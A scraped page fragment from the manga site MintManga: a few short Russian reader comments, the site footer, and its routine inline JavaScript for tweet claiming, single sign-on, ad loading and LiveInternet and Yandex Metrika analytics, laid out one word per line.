БЕРУ
*_*
какой
лапочка
*_*
31/03/11
function
claimTwitt(id,e){








jQuery.ajax({type:'POST',data:'id='+id,
url:'/internal/ajax/claimTwitt',success:function(data,textStatus){showNoty(data);},error:function(XMLHttpRequest,textStatus,errorThrown){}});;








$(e).closest('div').remove();




}




rm_h.updateTwitts();
Написать
комментарий
Ошибка
Жалоба
на
страницу
Редактировать
MintManga.com
Cruel…
1
-
1
Copyrights
and
trademarks
for
the
manga,
and
other
promotional
materials
are
the
property
of
their
respective
owners.


Use
of
these
materials
are
allowed
under
the
fair
use
clause
of
the
Copyright
Law
Пользовательское
Соглашение
|
Жалоба
на
контент
|
Для
правообладателей
|
Реклама
на
сайте
|
О
нас
Read Manga
Mint Manga
Find Anime
Dorama TV
Libre Book
Self Manga
Self Lib
GroupLe
(function()
{
var
kdm
=
document.createElement('script');
kdm.type
=
"text/javascript";
kdm.async
=
true;
kdm.src
=
"http://vogorana.ru/rotator/1983ae8db4a3699c3493b4cc23e9eba7.js";
var
s
=
document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(kdm,
s);
})();
$(".reader-modalbox").colorbox({










onComplete:
function(){












rm_h.twitterFocus(true);












$(".modal-window
input[type='text']:first").focus();
//
focus
on
the
first
text
input
field
in
the
first
field
on
the
page










},










onClosed:
function(){
rm_h.twitterFocus(false);
}








});
if
(!$.cookie('sso_timeout'))
{




$.cookie('sso_timeout',
'1',
{expires:
new
Date(new
Date().getTime()
+
120000),
path:
'/'});




if
(window['current_user_id'])
{






document.write("<iframe
src='//grouple.ru/external/dummy'
frameborder='no'
class='cpFrame'
height='1px'
width='10px'
scrolling='no'
frameborder='0'
border='0'
cellspacing='0'></iframe>");




}
else
{






$.ajax('//grouple.ru/external/hash?callback=?',
{
crossDomain:
true,
dataType:
'jsonp',
success:
function
(data)
{
rm_sso_h.newUpdate(data.token)
}});




}


}
document.write("<a
class='hide'

href='//www.liveinternet.ru/click'
"+
"target=_blank><img
src='//counter.yadro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"'
alt=''
title='LiveInternet:
показано
число
просмотров
и"+
"
посетителей
за
24
часа'
"+
"border='0'
width='88'
height='31'><\/a>")
(function(w,
c)
{




(w[c]
=
w[c]
||
[]).push(function()
{








try
{












w.yaCounter12908773
=
new
Ya.Metrika({id:12908773});








}








catch(e)
{
}




});
})(window,
"yandex_metrika_callbacks");
